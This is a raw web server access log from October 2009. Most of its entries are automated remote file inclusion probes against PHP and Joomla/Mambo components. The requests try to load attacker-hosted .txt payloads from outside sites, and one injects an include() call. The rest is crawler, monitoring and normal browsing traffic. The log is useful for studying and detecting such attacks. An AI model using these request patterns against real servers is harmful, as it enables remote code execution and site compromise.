222.236.47.182 - - [22/Oct/2009:00:39:49 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.236.47.182 - - [22/Oct/2009:00:39:49 -0400] "GET /logs/access_log.Q109071800%20%20//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
77.79.246.241 - - [22/Oct/2009:00:40:55 -0400] "GET /logs/access_log.Q109080600%20%20//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.71.23.37 - - [22/Oct/2009:00:41:02 -0400] "GET /logs/access_log.Q109080600%20%20//hw3.php?daysonly=0).include($_GET%5Bfile%5D).(0&file=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
77.79.246.241 - - [22/Oct/2009:00:41:05 -0400] "GET /logs/access_log.Q109091100%20%20//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.71.23.37 - - [22/Oct/2009:00:41:21 -0400] "GET /logs/access_log.Q109091100%20%20//hw3.php?daysonly=0).include($_GET%5Bfile%5D).(0&file=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
77.79.246.241 - - [22/Oct/2009:00:41:27 -0400] "GET /logs/access_log.Q109090500///?_SERVER[DOCUMENT_ROOT]=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.6.8.113 - - [22/Oct/2009:00:41:35 -0400] "GET /logs/access_log.Q109101000 HTTP/1.0" 200 2561417 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.133.19.18 - - [22/Oct/2009:00:44:01 -0400] "GET /logs/access_log.Q109090400//admin/setup.php?_SERVER[DOCUMENT_ROOT]=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
174.133.19.18 - - [22/Oct/2009:00:44:02 -0400] "GET /logs/error_log.Q109090400//admin/setup.php?_SERVER[DOCUMENT_ROOT]=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:44:18 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:44:18 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
216.71.23.37 - - [22/Oct/2009:00:44:19 -0400] "GET /logs/access_log.Q109090500///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.0" 404 227 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:44:20 -0400] "GET /logs/access_log.Q109071400%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:44:29 -0400] "GET /logs/access_log.Q109063000%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
213.3.26.176 - - [22/Oct/2009:00:44:31 -0400] "GET /logs/access_log.Q109062400//?path%5Bdocroot%5D=http://www.mv-moto.de/testforum/forum006/forum/pafiledb/images/screenshots/cmd.txt????? HTTP/1.1" 404 226 "-" "libwww-perl/5.831"
213.3.26.176 - - [22/Oct/2009:00:44:31 -0400] "GET //?path%5Bdocroot%5D=http://www.mv-moto.de/testforum/forum006/forum/pafiledb/images/screenshots/cmd.txt????? HTTP/1.1" 200 452 "-" "libwww-perl/5.831"
213.3.26.176 - - [22/Oct/2009:00:44:31 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.mv-moto.de/testforum/forum006/forum/pafiledb/images/screenshots/cmd.txt????? HTTP/1.1" 200 22863 "-" "libwww-perl/5.831"
213.3.26.176 - - [22/Oct/2009:00:44:32 -0400] "GET /logs/access_log.Q109082900//?path%5Bdocroot%5D=http://www.mv-moto.de/testforum/forum006/forum/pafiledb/images/screenshots/cmd.txt????? HTTP/1.1" 404 226 "-" "libwww-perl/5.831"
209.59.12.99 - - [22/Oct/2009:00:45:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.151.132.176 - - [22/Oct/2009:00:45:48 -0400] "GET /logs//errors.php?error=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
82.151.132.176 - - [22/Oct/2009:00:45:48 -0400] "GET //errors.php?error=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
24.86.67.28 - - [22/Oct/2009:00:45:56 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.86.67.28 - - [22/Oct/2009:00:45:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.86.67.28 - - [22/Oct/2009:00:45:56 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
24.86.67.28 - - [22/Oct/2009:00:45:56 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
69.94.125.100 - - [22/Oct/2009:00:46:04 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Oct/2009:00:46:04 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Oct/2009:00:46:04 -0400] "GET /logs/access_log.Q109091700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
217.75.13.234 - - [22/Oct/2009:00:46:11 -0400] "GET /logs/access_log.Q109072300/index.php?lg=http://www.pastie.org/664523.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
82.151.132.176 - - [22/Oct/2009:00:46:25 -0400] "GET //errors.php?error=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
82.151.132.176 - - [22/Oct/2009:00:46:25 -0400] "GET /logs//errors.php?error=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
82.151.132.176 - - [22/Oct/2009:00:46:39 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
82.151.132.176 - - [22/Oct/2009:00:46:39 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
82.151.132.176 - - [22/Oct/2009:00:46:39 -0400] "GET /logs/access_log.Q109080600/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
82.151.132.176 - - [22/Oct/2009:00:46:44 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
82.151.132.176 - - [22/Oct/2009:00:46:44 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
82.151.132.176 - - [22/Oct/2009:00:46:44 -0400] "GET /logs/access_log.Q109080600/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
217.75.13.234 - - [22/Oct/2009:00:46:52 -0400] "GET /logs/access_log.Q109051100/index.php?lg=http://www.pastie.org/664523.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.188.87.108 - - [22/Oct/2009:00:47:08 -0400] "GET /xmlrpc.php HTTP/1.1" 404 208 "-" "BOV"
58.230.118.81 - - [22/Oct/2009:00:47:45 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:47:45 -0400] "GET /logs/access_log.Q109071400%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:47:45 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:47:49 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:47:49 -0400] "GET /logs/access_log.Q109071400%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:47:49 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:47:50 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:47:51 -0400] "GET /logs/access_log.Q109071400%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:47:51 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:47:56 -0400] "GET /logs/access_log.Q109071400%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:47:56 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:47:57 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:47:57 -0400] "GET /logs/access_log.Q109063000%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:47:58 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:47:59 -0400] "GET /logs/access_log.Q109071400%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:47:58 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
62.182.62.35 - - [22/Oct/2009:00:48:00 -0400] "GET /logs/access_log.Q109071900/mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
62.182.62.35 - - [22/Oct/2009:00:48:00 -0400] "GET /mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
62.182.62.35 - - [22/Oct/2009:00:48:01 -0400] "GET /logs/access_log.Q109063000/mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
62.182.62.35 - - [22/Oct/2009:00:48:01 -0400] "GET /logs/mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
69.94.125.100 - - [22/Oct/2009:00:48:03 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Oct/2009:00:48:03 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Oct/2009:00:48:03 -0400] "GET /logs/access_log.Q109091700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:48:08 -0400] "GET /logs/access_log.Q109063000%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:48:09 -0400] "GET /logs/access_log.Q109063000%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:48:10 -0400] "GET /logs/access_log.Q109063000%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:48:11 -0400] "GET /logs/access_log.Q109063000%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
195.190.166.35 - - [22/Oct/2009:00:48:13 -0400] "GET /mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt???%0D?? HTTP/1.1" 404 216 "-" "libwww-perl/5.65"
195.190.166.35 - - [22/Oct/2009:00:48:13 -0400] "GET /logs/mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt???%0D?? HTTP/1.1" 404 221 "-" "libwww-perl/5.65"
195.190.166.35 - - [22/Oct/2009:00:48:13 -0400] "GET /logs/access_log.Q109082900%20/mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt???%0D?? HTTP/1.1" 404 244 "-" "libwww-perl/5.65"
195.190.166.35 - - [22/Oct/2009:00:48:13 -0400] "GET /logs/access_log.Q109052600%20/mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt???%0D?? HTTP/1.1" 404 244 "-" "libwww-perl/5.65"
82.151.132.176 - - [22/Oct/2009:00:48:47 -0400] "GET /logs/access_log.Q109080600%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
82.151.132.176 - - [22/Oct/2009:00:49:02 -0400] "GET /logs/access_log.Q109080600%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:49:05 -0400] "GET /logs/access_log.Q109071400///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:49:06 -0400] "GET /logs/error_log.Q109071400///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Oct/2009:00:49:08 -0400] "GET /logs/access_log.Q109091700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
216.71.23.37 - - [22/Oct/2009:00:49:26 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.0" 404 249 "-" "Mozilla/5.0"
216.71.23.37 - - [22/Oct/2009:00:49:27 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.0" 404 254 "-" "Mozilla/5.0"
216.71.23.37 - - [22/Oct/2009:00:49:27 -0400] "GET /logs/access_log.Q109061400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.0" 404 276 "-" "Mozilla/5.0"
216.71.23.37 - - [22/Oct/2009:00:49:32 -0400] "GET /logs/access_log.Q109072600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.0" 404 276 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Oct/2009:00:50:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.71.23.37 - - [22/Oct/2009:00:51:07 -0400] "GET /logs/access_log.Q109061400%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.0" 404 278 "-" "Mozilla/5.0"
216.71.23.37 - - [22/Oct/2009:00:51:09 -0400] "GET /logs/access_log.Q109072600%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.0" 404 278 "-" "Mozilla/5.0"
77.79.246.241 - - [22/Oct/2009:00:51:21 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
77.79.246.241 - - [22/Oct/2009:00:51:21 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
77.79.246.241 - - [22/Oct/2009:00:51:21 -0400] "GET /logs/access_log.Q109061400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
77.79.246.241 - - [22/Oct/2009:00:51:21 -0400] "GET /logs/access_log.Q109072600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
77.79.246.241 - - [22/Oct/2009:00:52:15 -0400] "GET /logs/access_log.Q109061400%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
77.79.246.241 - - [22/Oct/2009:00:52:15 -0400] "GET /logs/access_log.Q109072600%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:52:16 -0400] "GET /logs/access_log.Q109071400///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:52:16 -0400] "GET /logs/error_log.Q109071400///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:52:22 -0400] "GET /logs/access_log.Q109071400///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:52:22 -0400] "GET /logs/error_log.Q109071400///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:52:40 -0400] "GET /logs/access_log.Q109071400///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:52:41 -0400] "GET /logs/error_log.Q109071400///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:52:50 -0400] "GET /logs/access_log.Q109071400///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:52:50 -0400] "GET /logs/error_log.Q109071400///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:53:03 -0400] "GET /logs/access_log.Q109071400///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:53:03 -0400] "GET /logs/error_log.Q109071400///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.6.8.113 - - [22/Oct/2009:00:54:38 -0400] "GET /logs/error_log.Q109101200 HTTP/1.0" 200 3022410 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
75.145.207.9 - - [22/Oct/2009:00:54:47 -0400] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
75.145.207.9 - - [22/Oct/2009:00:54:47 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
75.145.207.9 - - [22/Oct/2009:00:54:47 -0400] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
75.145.207.9 - - [22/Oct/2009:00:54:47 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
75.145.207.9 - - [22/Oct/2009:00:54:47 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
75.145.207.9 - - [22/Oct/2009:00:54:48 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
75.145.207.9 - - [22/Oct/2009:00:54:52 -0400] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
75.145.207.9 - - [22/Oct/2009:00:54:52 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
75.145.207.9 - - [22/Oct/2009:00:54:52 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
74.6.8.113 - - [22/Oct/2009:00:54:41 -0400] "GET /logs/error_log.Q109101200 HTTP/1.0" 200 3022410 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.143.126.121 - - [22/Oct/2009:00:55:46 -0400] "GET //?_zb_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
209.59.12.99 - - [22/Oct/2009:00:55:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.75.13.234 - - [22/Oct/2009:00:56:07 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pastie.org/664523.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
217.75.13.234 - - [22/Oct/2009:00:56:07 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pastie.org/664523.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
217.75.13.234 - - [22/Oct/2009:00:56:14 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pastie.org/664523.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
75.145.207.9 - - [22/Oct/2009:00:56:22 -0400] "GET /logs/error_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
75.145.207.9 - - [22/Oct/2009:00:56:25 -0400] "GET /logs/error_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
75.145.207.9 - - [22/Oct/2009:00:56:25 -0400] "GET /logs/error_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
217.75.13.234 - - [22/Oct/2009:00:56:54 -0400] "GET /logs/access_log.Q109071100//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pastie.org/664523.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
64.87.17.186 - - [22/Oct/2009:00:57:23 -0400] "GET /index.php?option=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
64.87.17.186 - - [22/Oct/2009:00:57:23 -0400] "GET /logs/index.php?option=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
64.87.17.186 - - [22/Oct/2009:00:57:23 -0400] "GET /logs/access_log.Q109062900%20%20/index.php?option=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.71.51 - - [22/Oct/2009:00:57:55 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1143704F5AF975007D99093+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
